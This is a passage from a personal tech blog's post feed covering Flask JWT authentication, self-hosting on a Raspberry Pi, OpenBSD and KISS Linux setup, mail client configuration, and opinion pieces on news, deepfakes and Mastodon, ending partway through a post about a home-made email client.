icyphox's blog
https://icyphox.sh/
Computers, security and computer security.

Flask-JWT-Extended × Flask-Login

For the past few months, I’ve been working on building a backend for $STARTUP, with a bunch of friends. I’ll probably write in detail about it when we launch our beta. The backend is your bog standard REST API, built on Flask—if you didn’t guess from the title already.

Our existing codebase relies heavily on Flask-Login; it offers some pretty neat interfaces for dealing with users and their states. However, its default mode of operation—sessions—doesn’t really fit a Flask app that’s just an API. It’s not optimal. Besides, this is what JWTs were built for.

I won’t bother delving deep into JSON web tokens, but the general flow is like so:

  • client logs in via, say, /login
  • a unique token is sent back in the response
  • each subsequent authenticated request is sent with that token (see the sketch below)
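
Roughly, in curl terms (the endpoint and field names here are made up; in our app the token travels in the JSON body, which is what the loader config further down expects):

# log in; the 200 response carries the token
curl -s -X POST https://api.example.com/login \
  -H 'Content-Type: application/json' \
  -d '{"email": "user@example.com", "password": "hunter2", "remember": true}'
# => {"message": "Logged in successfully!", "access_token": "eyJ..."}

# every authenticated request thereafter sends the token along
curl -s -X POST https://api.example.com/things \
  -H 'Content-Type: application/json' \
  -d '{"access_token": "eyJ...", "name": "example"}'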

The neat thing about tokens is you can store stuff in them—“claims”, as they’re called.

returning an access_token to the client

The access_token is sent to the client upon login. The idea is simple: perform your usual checks (username / password, etc.) and log the user in via flask_login.login_user. Generate an access token using flask_jwt_extended.create_access_token, store your user identity (and other claims) in it, and return it to the client in your 200 response.

Here’s the excerpt from our codebase.

access_token = create_access_token(identity=email)
login_user(user, remember=request.json["remember"])
# good() is our little response helper; it wraps the 200 JSON reply
return good("Logged in successfully!", access_token=access_token)

But, for login_user to work, we need to set up a custom user loader to pull the identity out of the request and return the user object.

defining a custom user loader in Flask-Login

By default, Flask-Login handles user loading via the user_loader decorator, which should return a user object. However, since we want to pull the user out of the incoming request (the token carries the identity), we’ll have to write a custom user loader via the request_loader decorator.

from flask_jwt_extended import decode_token

# Tokens are looked for in the 'Authorization' header by default;
# we read ours out of the JSON body instead.
app.config["JWT_TOKEN_LOCATION"] = ["json"]

# Defaults to 'identity', but the spec prefers 'sub'.
app.config["JWT_IDENTITY_CLAIM"] = "sub"

# 'login' is the LoginManager instance.
@login.request_loader
def load_person_from_request(request):
    try:
        token = request.json["access_token"]
    except Exception:
        return None
    data = decode_token(token)
    # this can be your 'User' class
    person = PersonSignup.query.filter_by(email=data["sub"]).first()
    if person:
        return person
    return None

There’s just one mildly annoying thing to deal with, though. Flask-Login insists on setting a session cookie. We will have to disable this behaviour ourselves. And the best part? There’s no documentation for this—well there is, but it’s incomplete and points to deprecated functions.

To do this, we define a custom session interface, like so:

from flask.sessions import SecureCookieSessionInterface
from flask import g
from flask_login import user_loaded_from_request

# flag the request when the user came in via the request_loader,
# so save_session below knows to skip the cookie
@user_loaded_from_request.connect
def user_loaded_from_request(app, user=None):
    g.login_via_request = True


class CustomSessionInterface(SecureCookieSessionInterface):
    # never set a session cookie
    def should_set_cookie(self, *args, **kwargs):
        return False

    # skip saving the session entirely for token-based logins
    def save_session(self, *args, **kwargs):
        if g.get("login_via_request"):
            return
        return super(CustomSessionInterface, self).save_session(*args, **kwargs)


app.session_interface = CustomSessionInterface()

In essence, this checks the global store g for login_via_request and doesn’t set a cookie in that case. I’ve submitted a PR upstream for this to be included in the docs (#514).

https://icyphox.sh/blog/flask-jwt-login (Wed, 24 Jun 2020)

You don't need news

News—the never ending feed of information pertaining to “current events”, politics, trivia, and other equally useless junk. News today is literally just this: “<big name person> did/said <dumb thing>!”, “<group> protests against <bad thing>!”, and so on. Okay, shit’s going on in this world. Another day, another thing to be $FEELING about.

Now here’s a question for you: do you remember what news you consumed yesterday? The day before? Last week? Heck no! Maybe some major headlines, but really, what did you gain from learning that information? Must’ve been interesting to read at that time. Hence, news, by virtue of its “newness”, is given importance—and get this, it isn’t even important enough for you to bother remembering it for a few days.

News is entertainment. Quick gratification that lasts a day, at max.

actionable news

So what is useful news, then? I think I’ll go out on a limb here, and say “anything that is actionable”. By that I mean anything that you can physically affect / information that you can actually put to use. Again, there are probably edge-cases and this isn’t a rule that fits all, but it’s a decent principle to follow.

As an example, to readers living outside of the US, news regarding police brutality & the Black Lives Matter movement is unactionable. I’m not saying those problems don’t exist or don’t matter, but what are you really doing to help the cause? Sending thoughts and prayers? Posting angrily on Instagram? Tweeting about it? Stop, and think for yourself if these things actually make any difference. Your time might be better invested in doing something else.

other problems

There are other, more concerning problems with modern news—it is no longer purely objective. The sad state of news / reporting today is that it’s inherently biased. I mean political bias, of course. All news is either left-leaning or right-leaning, and narratives are developed to fit the outlet’s political stance. This is essentially propaganda. Today’s news is propaganda. If anything, this should be reason enough to avoid it.

but I compare multiple sources!

Okay, so you read the same thing written by CNN, BBC, The New York Times, etc.? Do you realize how much time you wasted doing this? Ultimately to what end—to forget about it by the next day, and do it all over again. What a dull, braindead process.

won’t I be ignorant then?

If you think keeping up with current events makes you intellectually superior somehow…boy are you wrong. Do something that actually stimulates your gray matter. But, here’s the thing, if the “news” is big enough, you’re bound to come across it anyway! You might hear your friend discuss it, or see it on Twitter, so on and so forth. How you process it thereafter is what matters.

Give it a thought. Imagine if all that social media, news, and general internet noise didn’t clog your head. I think it’ll be much nicer. You might not, and that’s okay. Mail your thoughts or @ me on the fedi—I’d like to hear them.

https://icyphox.sh/blog/dont-news (Sun, 21 Jun 2020)

Migrating to the RPi

I’d ordered the Raspberry Pi 4B (the 4GB variant) sometime early this year, thinking I’d get to self-hosting everything on it as soon as it arrived. As things turned out, it ended up sitting in its box up until two weeks ago—it took me that long to order an SD card for it. No, I didn’t have one. Anyway, from there began quite the wild ride.

flashing the SD card

You’d think this would be easy, right? Just plug it into your laptop’s SD card reader (or microSD), and flash it like you would a USB drive. Well, nope. Of the three laptops at home, one doesn’t have an SD card reader; mine—running OpenBSD—didn’t detect it, and my brother’s—running Void—didn’t detect it either.

Then it hit me: my phone (my brother’s, actually) has an SD card slot that actually works. Perhaps I could use the phone to flash the image? Took a bit of DDG’ing (ducking?), but we eventually figured out that the block device for the SD card on the phone was /dev/mmcblk1. Writing to it was just the usual dd invocation.
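
For reference, it looks something like this (the image name is illustrative, and the block device is whatever your card shows up as; double-check it before writing):

# from a root shell that can see the card
dd if=raspios.img of=/dev/mmcblk1 bs=4M
sync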

got NAT’d

After the initial setup, I was eager to move my services off the Digital Ocean VPS, to the RPi. I set up the SSH port forward through my router config, as a test. Turns out my ISP has me NAT’d. The entirety of my apartment is serviced by these fellas, and they have us all under a CG-NAT. Fantastic.

Evading this means I either lease a public IP from the ISP, or I continue using my VPS, and port forward traffic from it via a tunnel. I went with option two since it gives me something to do.

NAT evasion

This was fairly simple to set up with Wireguard and iptables. I don’t really want to get into detail here, since it’s been documented aplenty online, but in essence you put your VPS and the Pi on the same network, and forward traffic hitting your internet-facing interface (eth0) to the VPN’s (wg0). Fairly simple stuff.
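
For the curious, the VPS side boils down to a few lines like these (a sketch, assuming eth0 is the public interface and the Pi sits at 10.0.0.2 on wg0; addresses and ports are illustrative):

# let the VPS forward packets at all
sysctl -w net.ipv4.ip_forward=1

# send inbound web traffic down the tunnel to the Pi
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j DNAT --to-destination 10.0.0.2
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j DNAT --to-destination 10.0.0.2

# rewrite the source so replies go back out through the tunnel
iptables -t nat -A POSTROUTING -o wg0 -j MASQUERADE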

setting up Mastodon on the Pi

Mastodon was kind of annoying to get working. My initial plan was to port forward only a few selected ports, have Mastodon exposed on the Pi at some port via nginx, and then front that nginx via the VPS. So basically: Mastodon (localhost on Pi) <-> nginx (on Pi) <-> nginx (on VPS, via Wireguard). I hope that made sense.

Anyway, this setup would require having Mastodon run on HTTP, since I’ll be HTTPS’ing at the VPS. If you think about it, it’s kinda like what Cloudflare does. But, Mastodon doesn’t like running on HTTP. It just wasn’t working. So I went all in and decided to forward all 80/443 traffic and serve everything off the Pi.

Getting back to Mastodon—the initial few hiccups aside, I was able to get it running at toot.icyphox.sh. However, as a seeker of aesthetics, I wanted my handle to be @icyphox.sh. Turns out, this can be achieved fairly easily.

Add a new WEB_DOMAIN variable to your .env.production file, found in your Mastodon root dir. Set WEB_DOMAIN to your desired domain, and LOCAL_DOMAIN to the, well, undesired one. In my case:

WEB_DOMAIN=icyphox.sh
LOCAL_DOMAIN=toot.icyphox.sh

Funnily enough, the official documentation for this says the exact opposite, which…doesn’t work.

I don’t really understand why, but whatever; it works, and now my Mastodon is @x@icyphox.sh. I’m not complaining. Send mail if you know what’s going on here.
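
One way to sanity-check a split-domain setup like this: whatever domain appears in your handle has to answer webfinger lookups, which you can verify with curl:

# should return a small JSON document pointing at the actual Mastodon host
curl -s 'https://icyphox.sh/.well-known/webfinger?resource=acct:x@icyphox.sh'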

And oh, here’s the protective case this nerd fashioned out of cardboard.

raspberry pi case

https://icyphox.sh/blog/pi (Thu, 04 Jun 2020)

Site changes

The past couple of days, I’ve spent a fair amount of time tweaking this site. My site’s build process involves vite and a bunch of scripts. These scripts are executed via vite’s pre- and post-build actions. The big changes were performance improvements in the update_index.py script, and the addition of openring.py, which you can see at the very bottom of this post!

speeding up index page generation

The old script—the one that featured in Hacky scripts—was absolutely ridiculous, not to mention super slow. Here’s what it did:

  • got the most recent file (latest post) by sorting all posts by mtime.
  • parsed the markdown frontmatter and created a markdown table entry like:
line = f"| [{meta['title']}]({url}) | `{meta['date']}` |"
  • updated the markdown table (in _index.md) by in-place editing the markdown, with the line created earlier—for the latest post.
  • finally, I’d have to rebuild the entire site, since this markdown hackery happened at the very end of the build, i.e., it didn’t actually get rendered itself.

That…probably didn’t make much sense to you, did it? Don’t bother. I don’t know what I was thinking when I wrote that mess. So, with how it was done out of the way, here’s how it’s done now:

  • the metadata for all posts are nicely fetched and sorted using python-frontmatter.
  • the metadata list is fed into Jinja for use in templating, and is rendered very nicely using a simple for expression:
{% for p in posts %}
  <tr>
    <td align="left"><a href="/blog/{{ p.url }}">{{ p.title }}</a></td>
    <td align="right">{{ p.date }}</td>
  </tr>
{% endfor %}

A neat thing I learnt while working with Jinja is that you can use DebugUndefined in your jinja2.Environment definition to leave uninitialized template variables untouched in the output. Jinja’s default behaviour is to remove all uninitialized variables from the template output. So for instance, if you had:

<body>
    {{ body }}
</body>

<footer>
    {{ footer }}
</footer>

And if only {{ body }} was initialized in your template.render(body=body), the output you’d get would be:

<body>
    Hey there!
</body>
<footer>

</footer>

This is annoying if you’re attempting to generate your template across multiple stages, as I was. Now, I initialize my Jinja environment like so:

import jinja2
from jinja2 import DebugUndefined

env = jinja2.Environment(loader=template_loader, undefined=DebugUndefined)

I use the same trick for openring.py too. Speaking of…let’s talk about openring.py!

the new webring thing at the bottom

After having seen Drew’s openring, my NIH kicked in and I wrote openring.py. It pretty much does the exact same thing, except it’s a little more composable with vite. Currently, it reads a random sample of 3 feeds from a list of feeds provided in a feeds.txt file, and updates the webring with those posts. Like a feed-bingo of sorts. ;)
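
Conceptually, the sampling is nothing fancier than this one-liner (openring.py does the equivalent in Python, then renders the entries through a template):

# pick three feeds at random from the list
shuf -n 3 feeds.txt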

I really like how it turned out—especially the fact that I got my CSS grid correct on the first try!

https://icyphox.sh/blog/site-changes (Wed, 27 May 2020)

The efficacy of deepfakes

A few days back, NPR put out an article discussing why deepfakes aren’t all that powerful in spreading disinformation. Link to article.

According to the article:

“We’ve already passed the stage at which they would have been most effective,” said Keir Giles, a Russia specialist with the Conflict Studies Research Centre in the United Kingdom. “They’re the dog that never barked.”

I agree. This might be the case when it comes to Russian influence. There are simpler, more cost-effective ways to conduct active measures, like memes. Besides, America already has the infrastructure in place to combat influence ops, and has been doing so for a while now.

However, there are certain demographics whose governments may not have the capability to identify and perform damage control when a disinformation campaign hits, let alone deepfakes. An example of this demographic: India.

the Indian landscape

The disinformation problem in India is way more sophisticated, and harder to combat than in the West. There are a couple of reasons for this:

  • The infrastructure for fake news already exists: WhatsApp
  • Fact checking media in 22 different languages is non-trivial

India has had a long-standing problem with misinformation. The 2019 elections, the recent CAA controversy and even more recently—the coronavirus. In some cases, it has even led to mob violence.

All of this shows that the populace is easily influenced, and deepfakes are only going to simplify this. What’s worse is explaining to a rural crowd that something like a deepfake can exist—comprehension and adoption of technology has always been slow in India, and can be attributed to socio-economic factors.

There also exists a majority of the population that’s already been influenced to a certain degree: the right wing. A deepfake of a Muslim leader trashing Hinduism will be eaten up instantly. They are inclined to believe it is true, by virtue of prior influence and given the present circumstances.

countering deepfakes

The thing about deepfakes is the tech to spot them already exists. In fact, some can even be eyeballed. Deepfake imagery tends to have weird artifacting, which can be noticed upon closer inspection. Deepfake videos, of people specifically, blink / move weirdly. The problem at hand, however, is the general public cannot be expected to notice these at a quick glance, and the task of proving a fake is left to researchers and fact checkers.

Further, India does not have the infrastructure to combat deepfakes at scale. By the time a research group / think tank catches wind of it, the damage is likely already done. Besides, disseminating contradictory information, i.e. “this video is fake”, is also a task of its own. Public opinion has already been swayed, and the brain dislikes contradictions.

why haven’t we seen it yet?

Creating a deepfake isn’t trivial. Rather, creating a convincing one isn’t. I would also assume that most political propaganda outlets are just large social media operations. They lack the technical prowess and / or the funding to produce a deepfake. This doesn’t mean they can’t ever.

It goes without saying, but this post isn’t specific to India. I’d say other countries with a similar socio-economic status are in a similar predicament. Don’t write off deepfakes as a non-issue just because America did.

https://icyphox.sh/blog/efficacy-deepfakes (Mon, 11 May 2020)

Simplicity (mostly) guarantees security

Although it is a very comfy one, it’s not just an aesthetic. Simplicity and minimalism, in technology, are great for security too. I say “mostly” in the title because human error cannot be discounted, and nothing is perfect. However, a simpler tech stack is inherently more secure than a complex monstrosity.

Let’s look at systemd, for example. It’s got over 1.2 million lines of code. “Hurr durr but LoC doesn’t mean anything!” Sure, ok, but can you imagine auditing this? How many times has it even been audited? I couldn’t find any audit reports. No, the developers are not security engineers, and a trustworthy audit must be done by a third party. What’s scarier is that this thing runs on a huge percentage of the world’s critical infrastructure and contains privileged core subsystems.

“B-but Linux is much bigger!” Indeed, it is, but it has a thousand times (if not more) the number of eyes looking at the code, and there have been multiple third-party audits. There are hundreds of independent orgs and multiple security teams looking at it. That’s not the case with systemd—it’s probably just RedHat.

Compare this to a bunch of shell scripts. Agreed, writing safe shell can be hard and there are a ton of weird edge-cases depending on your shell implementation, but the distinction here is you wrote it. Which means, you can identify what went wrong—things are predictable. systemd, however, is a large blackbox, and its state at runtime is largely unprovable and unpredictable. I am certain even the developers don’t know.

And this is why I whine about complexity so much. A complex, unpredictable system is nothing more than a large attack surface. Drew DeVault, head of sourcehut, wrote something similar (yes, that’s the link; yes, it has a typo):

https://sourcehut.org/blog/2020-04-20-prioritizing-simplitity/

He manually provisions all sourcehut infrastructure, because tools like Salt, Kubernetes etc. are just like systemd in our example—large monstrosities which can get you RCE’d. Don’t believe me? See this.

This was day 3 of the #100DaysToOffload challenge. It came out like a systemd-hate post, but really, I couldn’t think of a better example.

https://icyphox.sh/blog/simplicity-security (Thu, 07 May 2020)

The S-nail mail client

TL;DR: Here’s my .mailrc.

As I’d mentioned in my blog post about mael, I’ve been on the lookout for a good, usable mail client. As it happens, I found S-nail just as I was about to give up on mael. Turns out writing an MUA isn’t all too easy after all. S-nail turned out to be the perfect client for me, but I had to invest quite some time in reading the very thorough manual and exchanging emails with its very friendly author. I did it so you don’t have to1, and I present to you this guide.

basic settings

These settings below should guarantee some sane defaults to get started with. Comments added for context.

# enable upward compatibility with S-nail v15.0
set v15-compat

# charsets we send mail in
set sendcharsets=utf-8,iso-8859-1

# reply back in sender's charset
set reply-in-same-charset

# prevent stripping of full names in replies
set fullnames

# adds a 'Mail-Followup-To' header; useful in mailing lists
set followup-to followup-to-honour-ask-yes

# asks for an attachment after composing
set askattach

# marks a replied message as answered
set markanswered

# honors the 'Reply-To' header
set reply-to-honour

# automatically launches the editor while composing mail interactively
set editalong

# I didn't fully understand this :) 
set history-gabby=all

# command history storage
set history-file=~/.s-nailhist

# sort mail by date (try 'thread' for threaded view)
set autosort=date

authentication

With these out of the way, we can move on to configuring our account—authenticating IMAP and SMTP. Before that, however, we’ll have to create a ~/.netrc file to store our account credentials.

(This, of course, assumes that your SMTP and IMAP credentials are the same. I don’t know what to do otherwise.)

machine *.domain.tld login user@domain.tld password hunter2

Once done, encrypt this file using gpg / gpg2. This is optional, but recommended.

$ gpg2 --symmetric --cipher-algo AES256 -o .netrc.gpg .netrc

You can now delete the plaintext .netrc file. Now add these lines to your .mailrc:

set netrc-lookup
set netrc-pipe='gpg2 -qd ~/.netrc.gpg'

Before we define our account block, add these two lines for a nicer IMAP experience:

set imap-cache=~/.cache/nail
set imap-keepalive=240

Defining an account is dead simple.

account "personal" {
    localopts yes
    set from="Your Name <user@domain.tld>"
    set folder=imaps://imap.domain.tld:993

    # copy sent messages to Sent; '+' indicates subdir of 'folder' 
    set record=+Sent
    set inbox=+INBOX

    # optionally, set this to 'smtps' and change the port accordingly
    # remove 'smtp-use-starttls'
    set mta=smtp://smtp.domain.tld:587 smtp-use-starttls

    # couple of shortcuts to useful folders
    shortcut sent +Sent \
        inbox +INBOX \
        drafts +Drafts \
        trash +Trash \
        archives +Archives
}

# enable account on startup
account personal

You might also want to trash mail, instead of perma-deleting them (delete does that). To achieve this, we define an alias:

define trash {
    move "$@" +Trash
}

commandalias del call trash

Replace +Trash with the relative path to your trash folder.

aesthetics

The fun stuff. I don’t feel like explaining what these do (hint: I don’t fully understand it either), so just copy-paste it and mess around with the colors:

# use whatever symbol you fancy
set prompt='> '

colour 256 sum-dotmark ft=bold,fg=13 dot
colour 256 sum-header fg=007 older
colour 256 sum-header bg=008 dot
colour 256 sum-header fg=white
colour 256 sum-thread bg=008 dot
colour 256 sum-thread fg=cyan

The prompt can be configured more extensively, but I don’t need it. Read the man page if you do.

essential commands

Eh, you can just read the man page, I guess. But here’s a quick list off the top of my head:

  • headers: Lists all messages, with the date, subject etc.
  • mail: Compose mail.
  • <number>: Read mail by specifying its number on the message list.
  • delete <number>: Delete mail.
  • new <number>: Mark as new (unread).
  • file <shortcut or path to folder>: Change folders. For example: file sent

That’s all there is to it.

This is day 2 of the #100DaysToOffload challenge. I didn’t think I’d participate, until today. So yesterday’s post is day 1. Will I keep at it? I dunno. We’ll see.


  1. Honestly, read the man page (and email Steffen!)—there’s a ton of useful options in there. 

https://icyphox.sh/blog/s-nail (Wed, 06 May 2020)

Stop joining mastodon.social

No, really. Do you actually understand why the Mastodon network exists, and what it stands for, or are you just LARPing? If you’re going to just cross-post from Twitter, why are you even on Mastodon?

Okay, so Mastodon is a “federated network”. What does that mean? You have a bunch of instances, each having their own userbase, and each instance federates with other instances, forming a distributed network. Got that? Cool. Now let’s get to the problem with mastodon.social.

mastodon.social is the instance run by the lead developer. Why does everybody flock to it? I’m really not sure, but if I were to hazard a guess, I’d say it’s because people don’t really understand federation. “Oh, big instance? I should probably join that.” Herd mentality? I dunno.

And what happens when every damn user joins just one instance? It becomes more Twitter, that’s what. The federation is gone. Nearly all activity is generated from just one instance. Here are some numbers:

  • Total number of users on Mastodon: ~2.2 million.
  • Number of users on mastodon.social: 529,923

Surprisingly, there’s an instance even bigger than mastodon.social—pawoo.net. I have no idea why it’s so big and it’s primarily Japanese. Its user count is over 620k. So mastodon.social and pawoo.net put together form over 1 million users, that’s more than 50% of the entire Mastodon populace. That’s nuts.1

And you’re only enabling this centralization by joining mastodon.social! Really, what even is there on mastodon.social? Have you even seen its local timeline? Probably not. Join an instance with more flavor. Are you into, say, the BSDs? Join bsd.network. Free software? fosstodon.org. Or host your own for yourself and your friends.

If you really do care about decentralization and freedom, and aren’t just memeing to look cool on Twitter, then move your account to another instance.2


  1. https://rosenzweig.io/blog/the-federation-fallacy.html 

  2. Go to /settings/migration from your instance’s web page. 

https://icyphox.sh/blog/mastodon-social (Tue, 05 May 2020)

OpenBSD on the HP Envy 13

My existing KISS install broke because I thought it would be a great idea to have apk-tools alongside the kiss package manager. It’s safe to say, that did not end well—especially when I installed, and then removed a package. With a semi-broken install that I didn’t feel like fixing, I figured I’d give OpenBSD a try. And I did.

installation and setup

Ran into some trouble booting off the USB initially; it turned out to be a faulty stick. Those things aren’t built to last, sadly. Flashed a new stick, booted up. Setup was pleasant, very straightforward. Didn’t really have to intervene much.

After booting in, I was greeted with a very archaic looking FVWM desktop. It’s not the prettiest thing, and it’s especially annoying to work with when you don’t have your mouse set up, i.e. no tap-to-click.

I needed wireless, and my laptop doesn’t have an Ethernet port. USB tethering just works, but the connection kept dying. I’m not sure why. Instead, I downloaded the iwm(4) firmware from here, loaded it up on a USB stick and copied it over to /etc/firmware. After that, it was as simple as running fw_update(1) and the firmware is auto-detected and loaded. In fact, if you have working Internet, fw_update will download the required firmware for you, too.

Configuring wireless is painless and I’m so glad to see that there’s no wpa_supplicant horror to deal with. It’s as simple as:

$ doas ifconfig iwm0 nwid YOUR_SSID wpakey YOUR_PSK

Also see hostname.if(5) to make this persist. After that, it’s only a matter of specifying your desired SSID, and ifconfig will automatically auth and procure an IP lease.

$ doas ifconfig iwm0 nwid YOUR_SSID
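
The hostname.if(5) route mentioned above amounts to a file like this (a minimal sketch; check the man page for the exact syntax on your release):

# /etc/hostname.iwm0
nwid YOUR_SSID wpakey YOUR_PSK
dhcp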

By now I was really starting to get exasperated by FVWM, and decided to switch to something nicer. I tried building 2bwm (my previous WM), but that failed. I didn’t bother trying to figure this out, so I figured I’d give cwm(1) a shot. After all, people sing high praises of it.

And boy, is it good. The config is a breeze, and actually pretty powerful. Here’s mine. cwm also has a built-in launcher, so dmenu isn’t necessary anymore. Refer to cwmrc(5) for all the config options.

Touchpad was pretty simple to set up too—OpenBSD has wsconsctl(8), which lets you set your tap-to-click, mouse acceleration etc. However, more advanced configuration can be achieved by getting Xorg to use the Synaptics driver. Just add a 70-synaptics.conf to /etc/X11/xorg.conf.d (make the dir if it doesn’t exist), containing:

Section "InputClass"
    Identifier "touchpad catchall"
    Driver "synaptics"
    MatchIsTouchpad "on"
    Option "TapButton1" "1"
    Option "TapButton2" "3"
    Option "TapButton3" "2"
    Option "VertEdgeScroll" "on"
    Option "VertTwoFingerScroll" "on"
    Option "HorizEdgeScroll" "on"
    Option "HorizTwoFingerScroll" "on"
    Option "VertScrollDelta" "111"
    Option "HorizScrollDelta" "111"
EndSection  

There are a lot more options that can be configured, see synaptics(4).

Suspend and hibernate just work, thanks to apm(8). Suspend on lid-close just needs one sysctl tweak:

$ sysctl machdep.lidaction=1

I believe it’s set to 1 by default on some installs, but I’m not sure.
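
To make it stick across reboots, drop it into /etc/sysctl.conf:

# /etc/sysctl.conf
machdep.lidaction=1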

impressions

I already really like the philosophy of OpenBSD—security and simplicity, while not losing out on sanity. The default install is plentiful, and has just about everything you’d need to get going. I especially enjoy how everything just works! I was pleasantly surprised to see my brightness and volume keys work without any configuration! It’s clear that the devs actually dogfood OpenBSD, unlike uh, cough Free- cough. Gosh I hope it’s not the flu. :^)

Oh, and did you notice all the manpage links I’ve littered throughout this post? They have manpages for everything; it’s ridiculous. And they’re very thorough. The Arch Wiki is good, but it’s incorrect at times, or simply outdated. OpenBSD’s manpages, although catering only to OpenBSD, have never failed me.

Performance and battery life are fine. Battery life is, in fact, identical, if not better than on Linux. OpenBSD disables HyperThreading/SMT for security reasons, but you can manually enable it if you wish to do so:

$ sysctl hw.smt=1

Package management is probably the only place where OpenBSD falls short. pkg_add(1) isn’t particularly fast, considering it’s written in Perl. The ports selection is fine; I have yet to find something I need that isn’t on there. I also wish they debloated packages; maybe I’ve just been spoilt by KISS. I now have D-Bus on my system thanks to Firefox. :(

I appreciate the fact that they don’t have a political document—a Code of Conduct. CoCs are awful, and have only proven to be harmful for projects; part of the reason why I’m sick of Linux and its community. Oh wait, OpenBSD does have one: https://www.openbsd.org/mail.html ;)

I’ll be exploring vmd(8) to see if I can get a Linux environment going. Perhaps that’ll be my next post, but when have I ever delivered?

I’ll close this post off with my new rice, and a sick ASCII art I made.

      \. -- --./  
      / ^ ^ ^ \
    (o)(o) ^ ^ |_/|
     {} ^ ^ > ^| \|
      \^ ^ ^ ^/
       / -- --\
                    ~icy

openbsd rice

https://icyphox.sh/blog/openbsd-hp-envy (Fri, 17 Apr 2020)

The Zen of KISS Linux

I installed KISS early in January on my main machine—an HP Envy 13 (2017), and I have since noticed a lot of changes in my workflow, my approach to software (and its development), and in life as a whole. I wouldn’t call KISS “life changing”, as that would be overly dramatic, but it has definitely reshaped my outlook towards technology—for better or worse.

When I talk about KISS to people—online or IRL—I get some pretty interesting reactions and comments.1 Ranging from “Oh cool.” to “You must be retarded.”, I’ve heard it all. A classic and a personal favourite of mine: “I don’t use meme distros because I actually get work done.” It is, actually, quite the opposite—I’ve been so much more productive using KISS than on any other operating system. I’ll explain why shortly.

The beauty of this “distro” is that it isn’t much of a distribution at all. There is no big team, no mailing lists, no infrastructure. The entire setup is so loose, and this makes it very convenient to swap things out for alternatives. The main (and potentially community) repos all reside locally on your system. In the event that Dylan decides to call it quits and switches to Windows, we can simply just bump versions ourselves, locally! The KISS Guidestones document is a good read.

In the subsequent paragraphs, I’ve laid out the different things about KISS that stand out to me, and that make using the system a lot more enjoyable.

the package system

Packaging for KISS has been delightful, to say the least. It takes me about 2 mins to write and publish a new package. Here’s the radare2 package, which I maintain, for example.

The build file (executable):

#!/bin/sh -e

./configure \
    --prefix=/usr

make
make DESTDIR="$1" install

The version file:

4.3.1 1

The checksums file (generated using kiss checksum radare2):

4abcb9c9dff24eab44d64d392e115ae774ab1ad90d04f2c983d96d7d7f9476aa  4.3.1.tar.gz

And finally, the sources file:

https://github.com/radareorg/radare2/archive/4.3.1.tar.gz

This is literally the bare minimum that you need to define a package. There’s also the depends file, where you specify the dependencies for your package. kiss also generates a manifest file to track all the files and directories that your package creates during installation, for their removal, if and when that occurs. Now compare this process with any other distribution’s.
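
For completeness, building and installing the thing is then just a couple of kiss invocations (a rough sketch, assuming the package lives in a repo kiss already knows about):

kiss checksum radare2   # generate the checksums file
kiss build radare2      # build from source, resolving dependencies
kiss install radare2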

the community

As far as I know, it mostly consists of the #kisslinux channel on Freenode and the r/kisslinux subreddit. It’s not that big, but it’s surprisingly active, and super helpful. There have been some interesting new KISS-related projects too: kiss-games—a repository for, well, Linux games; kiss-ppc64le and kiss-aarch64—KISS Linux ports for PowerPC and ARM64 architectures; wyvertux—an attempt at a GNU-free Linux distribution, using KISS as a base; and tons more.

the philosophy

Software today is far too complex. And its complexity is only growing. Some might argue that this is inevitable, and it is in fact progress. I disagree. Blindly adding layers and layers of abstraction (Docker, modern web “apps”) isn’t progress. Look at the Linux desktop ecosystem today, for example—monstrosities like GNOME and KDE are a result of this…new wave software engineering.

I see KISS as a symbol of defiance against this malformed notion. You don’t need all the bloat these DEs ship with to have a usable system. Agreed, it’s a bit more effort to get up and running, but it is entirely worth it. Think of it as a clean table—feels good to sit down and work on, doesn’t it?

Let’s take my own experience, for example. One of the first few pieces of software I’d install on a new system was dunst—a notification daemon. Unfortunately, it depends on D-Bus, which is Poetterware; ergo, not on KISS. However, using a system without notifications has been very pleasant. Nothing to distract you while you’re in the zone.

Another instance, again involving D-Bus (or not), is Bluetooth audio. As it happens, my laptop’s 3.5mm jack is rekt, and I need to use Bluetooth for audio, if at all. Sadly, Bluetooth audio on Linux hard-depends on D-Bus. Bluetooth stacks that don’t rely on D-Bus do exist, like on Android, but porting them over to desktop is non-trivial. However, I used this to my advantage and decided not to consume media on my laptop. This has drastically boosted my productivity, since I literally cannot watch YouTube even if I wanted to. My laptop is now strictly work-only. If I do need to watch the occasional video / listen to music, I use my phone. Compartmentalizing work and play to separate devices has worked out pretty well for me.

I’m slowly noticing myself favor low-tech (or no-tech) solutions to simple problems too. Like notetaking—I’ve tried plaintext files, Vim Wiki, Markdown, but nothing beats actually using pen and paper. Tech, from what I can see, doesn’t solve problems very effectively. In some cases, it only causes more of them. I might write another post discussing my thoughts on this in further detail.

I’m not sure what I intended this post to be, but I’m pretty happy with the mindspill. To conclude this already long monologue, let me clarify one little thing y’all are probably thinking, “Okay man, are you suggesting that we regress to the Dark Ages?”. No, I’m not suggesting that we regress, but rather, progress mindfully.


  1. No, I don’t go “I use KISS btw”. I don’t bring it up unless provoked. 

https://icyphox.sh/blog/kiss-zen (Fri, 03 Apr 2020)

Introducing mael

Update: The code lives here: https://github.com/icyphox/mael

I’ve been on the lookout for a good terminal-based email client since forever, and I’ve tried almost all of them. The one I use right now sucks a little less—aerc. I have some gripes with it though, like the problem with outgoing emails not getting copied to the Sent folder, and instead erroring out with a cryptic EOF—that’s literally all it says. I’ve tried mutt, but I find it a little excessive. It feels like the weechat of email—too many features that you’ll probably never use.

I need something clean and simple, less bloated (for lack of a better term). This is what motivated me to try writing my own. The result of this (not to mention being holed up at home with nothing better to do) is mael.1

mael isn’t like your usual TUI clients. I envision this to turn out similar to mailx—a prompt-based UI. The reason behind this UX decision is simple: it’s easier for me to write. :)

Speaking of writing it, it’s being written in a mix of Python and bash. Why? Because Python’s email and mailbox modules are fantastic, and I don’t think I want to parse Maildirs in bash. “But why not pure Python?” Well, I’m going to be shelling out a lot (more on this in a bit), and writing interactive UIs in bash is a lot more intuitive, thanks to some of the nifty features that later versions of bash have—read, mapfile etc.

The reason I’m shelling out is that two key components of this client that I haven’t yet talked about—mbsync and msmtp—are in use, for IMAP and SMTP respectively. And mbsync uses the Maildir format, which is why I’m relying on Python’s mailbox package. Why is this in the standard library anyway?!

The architecture of the client is pretty interesting (and possibly very stupid), but here’s what happens:

  • UI and prompt stuff in bash
  • emails are read using less
  • email templates (RFC 2822) are parsed and generated in Python
  • this is sent to bash in STDOUT, like
msg="$(./mael-parser "$maildir_message_path")"
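
To give you an idea of the shape of it, the bash side is roughly a loop like this (entirely hypothetical names; the real commands differ):

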